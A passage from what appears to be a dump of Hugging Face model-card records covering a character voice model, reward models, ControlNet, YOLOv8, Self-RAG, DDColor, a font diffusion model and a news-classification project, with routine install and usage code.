] | null | 2024-01-22T05:16:41Z | ---
license: mit
---

This is Ms. Mari's voice from Megaman NT Warrior. This was created with RVC V2, by Rejekts, trained for 300 epochs. If you would like to use the model, go here:
https://huggingface.co/PhoenixStormJr/RVC-V2-easy-gui-tutorial
Unfortunately, Ms. Mari doesn't talk much. Therefore, I had to use Tortoise-TTS to generate extra speech for Ms. Mari; I am NOT going to sit through hours of footage searching for ONE character's voice. If you would like a better model, go on ahead and cut the sections of Ms. Mari's voice using Audacity, or any other audio editing software, and upload the .wav file here. I will remove the background noise, enhance the audio, and train the model all myself, but I will NOT spend hours looking for Ms. Mari's voice. I need at least 6 minutes of Ms. Mari's speech to train the model.
Download Zip model here:
https://huggingface.co/PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC/resolve/main/MsMari.zip?download=true
Download .pth file here:
https://huggingface.co/PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC/resolve/main/MsMari.pth?download=true
Download .index here:
https://huggingface.co/PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC/resolve/main/added_IVF433_Flat_nprobe_1_MsMari_v2.index?download=true
Listen to a sample audio here:
<audio controls src="https://huggingface.co/PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC/resolve/main/MsMariSample.wav"></audio> |
thangvip/vi-t5-reward-model-6-epochs | thangvip | 2024-01-22T05:10:52Z | 4 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text-classification",
"generated_from_trainer",
"base_model:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"base_model:finetune:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-22T05:10:13Z | ---
license: mit
base_model: thangvip/vi-t5-base-finetune-rewriter-5-epochs
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: vi-t5-reward-model-6-epochs
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# vi-t5-reward-model-6-epochs
This model is a fine-tuned version of [thangvip/vi-t5-base-finetune-rewriter-5-epochs](https://huggingface.co/thangvip/vi-t5-base-finetune-rewriter-5-epochs) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.4914
- Accuracy: 0.8106
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1.41e-05
- train_batch_size: 32
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 6
### Training results
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
Charles-Elena/ControlNet-endpoint | Charles-Elena | 2024-01-22T05:05:21Z | 0 | 0 | null | [
"stable-diffusion",
"stable-diffusion-diffusers",
"controlnet",
"endpoints-template",
"arxiv:2302.05543",
"license:openrail",
"endpoints_compatible",
"region:us"
] | null | 2024-01-19T13:56:16Z | ---
license: openrail
tags:
- stable-diffusion
- stable-diffusion-diffusers
- controlnet
- endpoints-template
thumbnail: "https://huggingface.co/philschmid/ControlNet-endpoint/resolve/main/thumbnail.png"
inference: true
---
# Inference Endpoint for [ControlNet](https://huggingface.co/lllyasviel/ControlNet) using [runwayml/stable-diffusion-v1-5](https://huggingface.co/runwayml/stable-diffusion-v1-5)
> ControlNet is a neural network structure to control diffusion models by adding extra conditions.
> Official repository: https://github.com/lllyasviel/ControlNet
---
Blog post: [Controlled text to image generation with Inference Endpoints]()
This repository implements a custom `handler` task for `controlled text-to-image` generation on 🤗 Inference Endpoints. The code for the customized pipeline is in the [handler.py](https://huggingface.co/philschmid/ControlNet-endpoint/blob/main/handler.py).
There is also a [notebook](https://huggingface.co/philschmid/ControlNet-endpoint/blob/main/create_handler.ipynb) included, on how to create the `handler.py`

### expected Request payload
```json
{
"inputs": "A prompt used for image generation",
"negative_prompt": "low res, bad anatomy, worst quality, low quality",
"controlnet_type": "depth",
"image" : "iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAIAAAB7GkOtAAAABGdBTUEAALGPC",
}
```
Supported `controlnet_type` values are: `canny_edge`, `pose`, `depth`, `scribble`, `segmentation`, `normal`, `hed`, `hough`.
Below is an example of how to run a request using Python and `requests`.
## Use Python to send requests
1. Get image
```
wget https://huggingface.co/datasets/diffusers/test-arrays/resolve/main/stable_diffusion_imgvar/input_image_vermeer.png
```
2. Use the following code to send a request to the endpoint
```python
import json
from typing import List
import requests as r
import base64
from PIL import Image
from io import BytesIO
ENDPOINT_URL = "" # your endpoint url
HF_TOKEN = "" # your huggingface token `hf_xxx`
# helper image utils
def encode_image(image_path):
with open(image_path, "rb") as i:
b64 = base64.b64encode(i.read())
return b64.decode("utf-8")
def predict(prompt, image, negative_prompt=None, controlnet_type = "normal"):
image = encode_image(image)
# prepare sample payload
request = {"inputs": prompt, "image": image, "negative_prompt": negative_prompt, "controlnet_type": controlnet_type}
# headers
headers = {
"Authorization": f"Bearer {HF_TOKEN}",
"Content-Type": "application/json",
"Accept": "image/png" # important to get an image back
}
response = r.post(ENDPOINT_URL, headers=headers, json=request)
if response.status_code != 200:
print(response.text)
raise Exception("Prediction failed")
img = Image.open(BytesIO(response.content))
return img
prediction = predict(
prompt = "cloudy sky background lush landscape house and green trees, RAW photo (high detailed skin:1.2), 8k uhd, dslr, soft lighting, high quality, film grain, Fujifilm XT3",
negative_prompt ="lowres, bad anatomy, worst quality, low quality, city, traffic",
controlnet_type = "hed",
image = "huggingface.png"
)
prediction.save("result.png")
```
expected output

[Adding Conditional Control to Text-to-Image Diffusion Models](https://arxiv.org/abs/2302.05543) by Lvmin Zhang and Maneesh Agrawala.
Using the pretrained models we can provide control images (for example, a depth map) to control Stable Diffusion text-to-image generation so that it follows the structure of the depth image and fills in the details.
The abstract of the paper is the following:
We present a neural network structure, ControlNet, to control pretrained large diffusion models to support additional input conditions. The ControlNet learns task-specific conditions in an end-to-end way, and the learning is robust even when the training dataset is small (< 50k). Moreover, training a ControlNet is as fast as fine-tuning a diffusion model, and the model can be trained on a personal devices. Alternatively, if powerful computation clusters are available, the model can scale to large amounts (millions to billions) of data. We report that large diffusion models like Stable Diffusion can be augmented with ControlNets to enable conditional inputs like edge maps, segmentation maps, keypoints, etc. This may enrich the methods to control large diffusion models and further facilitate related applications. |
MMaitra/mistral_7b_instruct_finetuned_multi_intent_v2 | MMaitra | 2024-01-22T05:03:23Z | 5 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"bitsandbytes",
"region:us"
] | text-generation | 2024-01-22T05:00:16Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
CLMBR/binding-domain-transformer-1 | CLMBR | 2024-01-22T04:41:05Z | 12 | 0 | transformers | [
"transformers",
"pytorch",
"opt",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-17T22:41:41Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-domain-transformer-1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-domain-transformer-1
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.8640
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 1
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.2283 | 0.03 | 76320 | 4.1941 |
| 4.0243 | 1.03 | 152640 | 4.0262 |
| 3.9173 | 0.03 | 228960 | 3.9514 |
| 3.8504 | 1.03 | 305280 | 3.9111 |
| 3.7979 | 0.03 | 381600 | 3.8853 |
| 3.7588 | 1.03 | 457920 | 3.8699 |
| 3.7224 | 0.03 | 534240 | 3.8585 |
| 3.6906 | 1.03 | 610560 | 3.8527 |
| 3.6618 | 0.03 | 686880 | 3.8482 |
| 3.6386 | 1.03 | 763200 | 3.8459 |
| 3.6152 | 0.03 | 839520 | 3.8439 |
| 3.5967 | 1.03 | 915840 | 3.8431 |
| 3.5763 | 0.03 | 992160 | 3.8437 |
| 3.5566 | 1.03 | 1068480 | 3.8448 |
| 3.5413 | 0.03 | 1144800 | 3.8449 |
| 3.5279 | 1.03 | 1221120 | 3.8464 |
| 3.5106 | 0.03 | 1297440 | 3.8481 |
| 3.4966 | 1.03 | 1373760 | 3.8490 |
| 3.4844 | 0.03 | 1450080 | 3.8513 |
| 3.4781 | 1.03 | 1526400 | 3.8521 |
| 3.4691 | 0.03 | 1602720 | 3.8546 |
| 3.4597 | 1.03 | 1679040 | 3.8549 |
| 3.4479 | 0.03 | 1755360 | 3.8568 |
| 3.4377 | 0.03 | 1831680 | 3.8569 |
| 3.4244 | 1.03 | 1908000 | 3.8591 |
| 3.4133 | 0.03 | 1984320 | 3.8610 |
| 3.4017 | 1.03 | 2060640 | 3.8621 |
| 3.3917 | 0.03 | 2136960 | 3.8624 |
| 3.3815 | 1.03 | 2213280 | 3.8639 |
| 3.3687 | 0.03 | 2289600 | 3.8646 |
| 3.359 | 1.03 | 2365920 | 3.8655 |
| 3.3507 | 0.03 | 2442240 | 3.8657 |
| 3.3372 | 1.03 | 2518560 | 3.8672 |
| 3.3274 | 0.03 | 2594880 | 3.8672 |
| 3.3177 | 1.03 | 2671200 | 3.8677 |
| 3.3143 | 0.03 | 2747520 | 3.8678 |
| 3.3102 | 1.03 | 2823840 | 3.8670 |
| 3.3059 | 0.03 | 2900160 | 3.8662 |
| 3.2984 | 1.03 | 2976480 | 3.8647 |
| 3.2904 | 0.02 | 3052726 | 3.8640 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
thangvip/vi-t5-reward-model-5-epochs | thangvip | 2024-01-22T04:40:38Z | 4 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text-classification",
"generated_from_trainer",
"base_model:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"base_model:finetune:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-22T04:40:00Z | ---
license: mit
base_model: thangvip/vi-t5-base-finetune-rewriter-5-epochs
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: vi-t5-reward-model-5-epochs
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# vi-t5-reward-model-5-epochs
This model is a fine-tuned version of [thangvip/vi-t5-base-finetune-rewriter-5-epochs](https://huggingface.co/thangvip/vi-t5-base-finetune-rewriter-5-epochs) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.4372
- Accuracy: 0.8238
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1.41e-05
- train_batch_size: 32
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
linhcuem/chamdiemgianhang_yolov8 | linhcuem | 2024-01-22T04:37:47Z | 4 | 0 | ultralytics | [
"ultralytics",
"tensorboard",
"v8",
"ultralyticsplus",
"yolov8",
"yolo",
"vision",
"object-detection",
"pytorch",
"model-index",
"region:us"
] | object-detection | 2024-01-22T04:37:42Z |
---
tags:
- ultralyticsplus
- yolov8
- ultralytics
- yolo
- vision
- object-detection
- pytorch
library_name: ultralytics
library_version: 8.0.43
inference: false
model-index:
- name: linhcuem/chamdiemgianhang_yolov8
results:
- task:
type: object-detection
metrics:
- type: precision # since [email protected] is not available on hf.co/metrics
value: 0.86296 # min: 0.0 - max: 1.0
name: [email protected](box)
---
<div align="center">
<img width="640" alt="linhcuem/chamdiemgianhang_yolov8" src="https://huggingface.co/linhcuem/chamdiemgianhang_yolov8/resolve/main/thumbnail.jpg">
</div>
### Supported Labels
```
['bom_gen', 'bom_jn', 'bom_knp', 'bom_sachet', 'bom_vtgk', 'bom_ytv', 'hop_jn', 'hop_vtg', 'hop_ytv', 'lo_kid', 'lo_ytv', 'loc_dln', 'loc_jn', 'loc_kids', 'loc_ytv', 'pocky', 'tui_gen', 'tui_jn', 'tui_sachet', 'tui_vtgk']
```
### How to use
- Install [ultralyticsplus](https://github.com/fcakyon/ultralyticsplus):
```bash
pip install ultralyticsplus==0.0.28 ultralytics==8.0.43
```
- Load model and perform prediction:
```python
from ultralyticsplus import YOLO, render_result
# load model
model = YOLO('linhcuem/chamdiemgianhang_yolov8')
# set model parameters
model.overrides['conf'] = 0.25 # NMS confidence threshold
model.overrides['iou'] = 0.45 # NMS IoU threshold
model.overrides['agnostic_nms'] = False # NMS class-agnostic
model.overrides['max_det'] = 1000 # maximum number of detections per image
# set image
image = 'https://github.com/ultralytics/yolov5/raw/master/data/images/zidane.jpg'
# perform inference
results = model.predict(image)
# observe results
print(results[0].boxes)
render = render_result(model=model, image=image, result=results[0])
render.show()
```
|
ZhiguangHan/mt5-small-task3-dataset4 | ZhiguangHan | 2024-01-22T04:37:35Z | 5 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"mt5",
"text2text-generation",
"generated_from_trainer",
"base_model:google/mt5-small",
"base_model:finetune:google/mt5-small",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2023-12-09T17:50:34Z | ---
license: apache-2.0
base_model: google/mt5-small
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: mt5-small-task3-dataset4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mt5-small-task3-dataset4
This model is a fine-tuned version of [google/mt5-small](https://huggingface.co/google/mt5-small) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 1.6024
- Accuracy: 0.038
- Mse: 6.4524
- Log-distance: 0.6628
- S Score: 0.4912
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5.6e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 15
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | Mse | Log-distance | S Score |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:------:|:------------:|:-------:|
| 12.4369 | 1.0 | 250 | 2.2550 | 0.038 | 6.7116 | 0.6817 | 0.4748 |
| 3.1387 | 2.0 | 500 | 1.8576 | 0.024 | 5.8813 | 0.7455 | 0.4552 |
| 2.3265 | 3.0 | 750 | 1.6663 | 0.05 | 7.7168 | 0.7232 | 0.4556 |
| 1.9955 | 4.0 | 1000 | 1.6121 | 0.04 | 6.3175 | 0.6614 | 0.4908 |
| 1.8234 | 5.0 | 1250 | 1.6380 | 0.034 | 6.8099 | 0.6780 | 0.4860 |
| 1.7591 | 6.0 | 1500 | 1.5953 | 0.04 | 6.3175 | 0.6614 | 0.4908 |
| 1.7194 | 7.0 | 1750 | 1.5996 | 0.054 | 6.0821 | 0.6559 | 0.4976 |
| 1.6988 | 8.0 | 2000 | 1.5970 | 0.048 | 6.6575 | 0.6618 | 0.4952 |
| 1.6831 | 9.0 | 2250 | 1.6024 | 0.038 | 6.4524 | 0.6628 | 0.4912 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
selfrag/selfrag_llama2_7b | selfrag | 2024-01-22T04:06:17Z | 4,136 | 77 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"arxiv:2310.11511",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-10-18T00:12:34Z | ---
license: mit
---
This model is a 7B [Self-RAG](https://selfrag.github.io/) model that generates outputs to diverse user queries as well as *reflection tokens* to call the retrieval system adaptively and criticize its own output and retrieved passages.
Self-RAG is trained on our instruction-following corpora with interleaving passages and reflection tokens using the standard next-token prediction objective, enabling efficient and stable learning with fine-grained feedback.
At inference, we leverage reflection tokens covering diverse aspects of generations to sample the best output aligning with users' preferences.
See full descriptions in [our paper](https://arxiv.org/abs/2310.11511).
## Usage
Here, we show an easy way to quickly download our model from HuggingFace and run with `vllm` with pre-given passages. Make sure to install dependencies listed at [self-rag/requirements.txt](https://github.com/AkariAsai/self-rag/blob/main/requirements.txt).
To run our full inference pipeline with a retrieval system and fine-grained tree decoding, please use [our code](https://github.com/AkariAsai/self-rag).
```py
from transformers import AutoTokenizer, AutoModelForCausalLM
from vllm import LLM, SamplingParams
model = LLM("selfrag/selfrag_llama2_7b", download_dir="/gscratch/h2lab/akari/model_cache", dtype="half")
sampling_params = SamplingParams(temperature=0.0, top_p=1.0, max_tokens=100, skip_special_tokens=False)
def format_prompt(input, paragraph=None):
prompt = "### Instruction:\n{0}\n\n### Response:\n".format(input)
if paragraph is not None:
prompt += "[Retrieval]<paragraph>{0}</paragraph>".format(paragraph)
return prompt
query_1 = "Leave odd one out: twitter, instagram, whatsapp."
query_2 = "Can you tell me the difference between llamas and alpacas?"
queries = [query_1, query_2]
preds = model.generate([format_prompt(query) for query in queries], sampling_params)
for pred in preds:
print("Model prediction: {0}".format(pred.outputs[0].text))
# Model prediction: Twitter, Instagram, and WhatsApp are all social media platforms.[No Retrieval]WhatsApp is the odd one out because it is a messaging app, while Twitter and # Instagram are primarily used for sharing photos and videos.[Utility:5]</s> (this query doesn't require factual grounding; just skip retrieval and do normal instruction-following generation)
# Model prediction: Sure![Retrieval]<paragraph> ... (this query requires factual grounding, call a retriever)
# generate with retrieved passage
prompt = format_prompt("Can you tell me the difference between llamas and alpacas?", paragraph="The alpaca (Lama pacos) is a species of South American camelid mammal. It is similar to, and often confused with, the llama. Alpacas are considerably smaller than llamas, and unlike llamas, they were not bred to be working animals, but were bred specifically for their fiber.")
preds = model.generate([prompt], sampling_params)
print([pred.outputs[0].text for pred in preds])
# ['[Relevant]Alpacas are considerably smaller than llamas, and unlike llamas, they were not bred to be working animals, but were bred specifically for their fiber.[Fully supported][Utility:5]</s>']
```
## Input Format
As described in the `format_prompt` function, your input should be formed as
```
### Instruction:\n{instruction}\n\n### Response:\n".format(instruction)
```
or
```
### Instruction:\n{instruction}\n\n### Input:\n{input}\n\n### Response:\n"
```
if you have additional input.
You can insert paragraphs anywhere after `### Response:\n"`, but make sure to mark paragraphs as paragraph tokens (i.e., `<paragraph>{0}</paragraph>`).
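For example, calling the `format_prompt` helper above with the llama/alpaca passage from the usage section yields a prompt like this (newlines expanded for readability):
```
### Instruction:
Can you tell me the difference between llamas and alpacas?

### Response:
[Retrieval]<paragraph>The alpaca (Lama pacos) is a species of South American camelid mammal. It is similar to, and often confused with, the llama. ...</paragraph>
```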
## Training details
Our training data is available at the HuggingFace dataset [selfrag_train_data](https://huggingface.co/datasets/selfrag/selfrag_train_data).
See our official repository for the training details.
We used 8 A100 40GB for training on the Stability HPC server.
## Citation and contact
If you use this model, please cite our work:
```
@article{asai2023selfrag,
author = {Asai, Akari and Wu, Zeqiu and Wang, Yizhong and Sil, Avirup and Hajishirzi, Hannaneh},
title = {{Self-RAG}: Learning to Retrieve, Generate, and Critique through Self-Reflection},
year = {2023},
journal = { arXiv preprint arXiv:2310.11511 },
URL = {https://arxiv.org/abs/2310.11511}
}
``` |
piddnad/DDColor-models | piddnad | 2024-01-22T04:03:13Z | 0 | 23 | null | [
"arxiv:2212.11613",
"license:apache-2.0",
"region:us"
] | null | 2023-09-07T07:42:11Z | ---
license: apache-2.0
---
Pretrained model for DDColor
For more information, see [DDColor Model Zoo](https://github.com/piddnad/DDColor/blob/main/MODEL_ZOO.md)
* Paper: https://arxiv.org/abs/2212.11613
* Code: https://github.com/piddnad/DDColor
## Citation
If our work is helpful for your research, please consider citing:
```
@article{kang2022ddcolor,
title={DDColor: Towards Photo-Realistic Image Colorization via Dual Decoders},
author={Kang, Xiaoyang and Yang, Tao and Ouyang, Wenqi and Ren, Peiran and Li, Lingzhi and Xie, Xuansong},
journal={arXiv preprint arXiv:2212.11613},
year={2022}
}
``` |
Leeps/sd-font-model | Leeps | 2024-01-22T04:00:26Z | 3 | 3 | diffusers | [
"diffusers",
"tensorboard",
"safetensors",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"dataset:Leeps/Fonts-Individual-Letters",
"base_model:runwayml/stable-diffusion-v1-5",
"base_model:finetune:runwayml/stable-diffusion-v1-5",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | 2024-01-21T21:16:58Z |
---
license: creativeml-openrail-m
base_model: runwayml/stable-diffusion-v1-5
datasets:
- Leeps/Fonts-Individual-Letters
tags:
- stable-diffusion
- stable-diffusion-diffusers
- text-to-image
- diffusers
inference: true
---
# Text-to-image finetuning - Leeps/sd-font-model
This pipeline was finetuned from **runwayml/stable-diffusion-v1-5** on the **Leeps/Fonts-Individual-Letters** dataset. No example prompts or generated images were recorded for this run.
## Pipeline usage
You can use the pipeline like so:
```python
from diffusers import DiffusionPipeline
import torch
pipeline = DiffusionPipeline.from_pretrained("Leeps/sd-font-model", torch_dtype=torch.float16)
```
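The loaded pipeline can then be used to generate an image. This is a minimal sketch, not part of the original card; the prompt and the CUDA device are placeholder assumptions:
```python
pipeline = pipeline.to("cuda")  # assumes a CUDA GPU is available
# hypothetical prompt -- adjust to the letter/font style you want
image = pipeline("the letter A in a serif font").images[0]
image.save("letter.png")
```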
## Training info
These are the key hyperparameters used during training:
* Epochs: 1
* Learning rate: 1e-05
* Batch size: 1
* Gradient accumulation steps: 4
* Image resolution: 64
* Mixed-precision: fp16
|
transiteration/scaling-ml | transiteration | 2024-01-22T03:55:42Z | 0 | 0 | null | [
"pytorch",
"mlflow",
"ray",
"fastapi",
"nlp",
"text-classification",
"en",
"license:mit",
"region:us"
] | text-classification | 2024-01-21T22:17:43Z | ---
license: mit
language:
- en
pipeline_tag: text-classification
tags:
- pytorch
- mlflow
- ray
- fastapi
- nlp
---
## Scaling-ML
Scaling-ML is a project that classifies news headlines into 10 groups.
The main part of the project is fine-tuning the [BERT](https://huggingface.co/allenai/scibert_scivocab_uncased)[1] model, together with tools like MLflow for experiment tracking, Ray for scaling and distributed computing, and MLOps components for seamless management of machine learning workflows.
### Set Up
1. Clone the repository:
```bash
git clone https://github.com/your-username/scaling-ml.git
cd scaling-ml
```
2. Set up your virtual environment and install dependencies:
```bash
export PYTHONPATH=$PYTHONPATH:$PWD
pip install -r requirements.txt
```
### Scripts Overview
```bash
scripts
├── app.py
├── config.py
├── data.py
├── evaluate.py
├── model.py
├── predict.py
├── train.py
├── tune.py
└── utils.py
```
- `app.py` - Implementation of FastAPI web service for serving a model.
- `config.py` - Configuration of logging settings, directory structures, and MLflow registry.
- `data.py` - Functions and a class for data preprocessing tasks in a scalable machine learning project.
- `evaluate.py` - Evaluating the performance of a model, calculating precision, recall, and F1 score.
- `model.py` - Fine-tuned language model with an added fully connected layer for classification tasks.
- `predict.py` - TorchPredictor class for making predictions using a PyTorch-based model.
- `train.py` - Training process using Ray for distributed training.
- `tune.py` - Hyperparameter tuning for Language Model using Ray Tune.
- `utils.py` - Various utility functions for handling data, setting random seeds, saving and loading dictionaries, etc.
#### Dataset
For training, a small portion of the [News Category Dataset](https://www.kaggle.com/datasets/setseries/news-category-dataset) was used, which contains numerous headlines and descriptions of various articles.
### How to Train
```bash
export DATASET_LOC="path/to/dataset"
export TRAIN_LOOP_CONFIG='{"dropout_p": 0.5, "lr": 1e-4, "lr_factor": 0.8, "lr_patience": 5}'
python3 scripts/train.py \
--experiment_name "llm_train" \
--dataset_loc $DATASET_LOC \
--train_loop_config "$TRAIN_LOOP_CONFIG" \
--num_workers 1 \
--cpu_per_worker 1 \
--gpu_per_worker 0 \
--num_epochs 1 \
--batch_size 128 \
--results_fp results.json
```
- experiment_name: A name for the experiment or run, in this case, "llm_train".
- dataset_loc: The location of the training dataset, replace with the actual path.
- train_loop_config: The configuration for the training loop, replace with the actual configuration.
- num_workers: The number of workers used for parallel processing. Adjust based on available CPU resources.
- cpu_per_worker: The number of CPU cores assigned to each worker. Adjust based on available CPU resources.
- gpu_per_worker: The number of GPUs assigned to each worker. Adjust based on available GPU resources.
- num_epochs: The number of training epochs.
- batch_size: The batch size used during training.
- results_fp: The file path to save the results.
### How to Tune
```bash
export DATASET_LOC="path/to/dataset"
export INITIAL_PARAMS='{"dropout_p": 0.5, "lr": 1e-4, "lr_factor": 0.8, "lr_patience": 5}'
python3 scripts/tune.py \
--experiment_name "llm_tune" \
--dataset_loc "$DATASET_LOC" \
--initial_params "$INITIAL_PARAMS" \
--num_workers 1 \
--cpu_per_worker 1 \
--gpu_per_worker 0 \
--num_runs 1 \
--grace_period 1 \
--num_epochs 1 \
--batch_size 128 \
--results_fp results.json
```
- num_runs: The number of tuning runs to perform.
- grace_period: The grace period for early stopping during hyperparameter tuning.
**Note**: modify the values of the `--num_workers`, `--cpu_per_worker`, and `--gpu_per_worker` parameters above according to the resources available on your system.
### Experiment Tracking with MLflow
```bash
mlflow server -h 0.0.0.0 -p 8080 --backend-store-uri /path/to/mlflow/folder
```
### Evaluation
```bash
